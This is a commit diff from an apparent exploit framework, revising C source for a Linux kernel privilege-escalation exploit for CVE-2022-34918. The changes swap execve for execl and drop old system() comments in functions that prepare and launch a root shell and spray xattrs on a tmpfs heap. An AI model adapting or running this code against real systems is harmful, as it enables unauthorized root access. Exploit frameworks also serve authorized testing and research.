Updates to the C source code (execl instead of execve, removal of some old comments)

2024-07-18 18:31:41 +02:00 · 2022-07-25 22:18:47 +02:00 · 2022-07-25 22:18:47 +02:00 · 78dae84871
commit 78dae84871
parent ae9932d921
3 changed files with 4 additions and 10 deletions
--- a/data/exploits/CVE-2022-34918/ubuntu.elf
+++ b/data/exploits/CVE-2022-34918/ubuntu.elf
--- a/external/source/exploits/CVE-2022-34918/src/modprobe.c
+++ b/external/source/exploits/CVE-2022-34918/src/modprobe.c
@ -34,10 +34,9 @@ void prepare_root_shell(char* payload) {
        do_error_exit("sem_init");

    if (!fork()) {
-        //REMOVE system("cp get_root /tmp");
        sem_wait(shell_barrier);
-        //REMOVE system(payload);
-        execve(payload, NULL, NULL);
+
+        execl(payload, payload, NULL);
        exit(EXIT_FAILURE);
    }
 }
@ -60,7 +59,7 @@ void get_root_shell(void) {
    int pid = fork();
    if (pid == 0)
    {
-        execve("/tmp/dummy", NULL, NULL);
+        execl("/tmp/dummy", "/tmp/dummy", NULL);
        exit(EXIT_FAILURE);
    }
    printf("[?] waitpid\n");
--- a/external/source/exploits/CVE-2022-34918/src/simple_xattr.c
+++ b/external/source/exploits/CVE-2022-34918/src/simple_xattr.c
@ -17,7 +17,6 @@
 */
 void spray_simple_xattr(char *filename, uint32_t spray_size) {

-    char command[COMMAND_MAX_LEN];
    char attribute_name[ATTRIBUTE_NAME_LEN];

    /* Mount a new tmpfs to be able to set security xattr */
@ -25,17 +24,13 @@ void spray_simple_xattr(char *filename, uint32_t spray_size) {
    {
 		do_error_exit("mkdir");
 	}
-    //REMOVE: system("mkdir -p /tmp/tmpfs/");
    if (mount(NULL, "/tmp/tmpfs", "tmpfs", 0, NULL) == -1)
    {
 		do_error_exit("mount");
 	}
-    //REMOVE: system("mount -t tmpfs none /tmp/tmpfs");
    
    /* Create a file to the set attributes */
-    //REMOVE: snprintf(command, COMMAND_MAX_LEN, "touch %s", filename);
-    
-    //REMOVE: system(command);
+
    int fd = creat(filename, 0644);
    close(fd);